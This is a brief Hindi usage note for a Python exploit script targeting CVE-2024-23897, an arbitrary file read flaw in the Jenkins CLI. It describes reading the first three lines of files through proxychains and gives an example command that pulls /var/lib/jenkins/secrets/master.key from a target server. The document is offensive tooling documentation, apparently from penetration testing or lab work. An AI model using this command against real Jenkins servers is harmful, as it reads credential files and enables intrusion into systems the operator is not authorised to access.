
Jenkins CLI मनमाना पठन (CVE-2024-23897 संस्करण 2.442 और LTS 2.426.3 से नीचे के संस्करणों पर लागू होता है)
सिस्टम पर वर्तमान उपयोगकर्ता के लिए पढ़ने की अनुमति वाली किसी भी फ़ाइल की पहली 3 पंक्तियाँ पढ़ें। स्क्रिप्ट आंतरिक रूप से proxychains का उपयोग कर रही है।
उपयोग:
python CVE-2024-23897.py <jenkins-cli.jar path> <target URI> <file path>
उदाहरण:
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key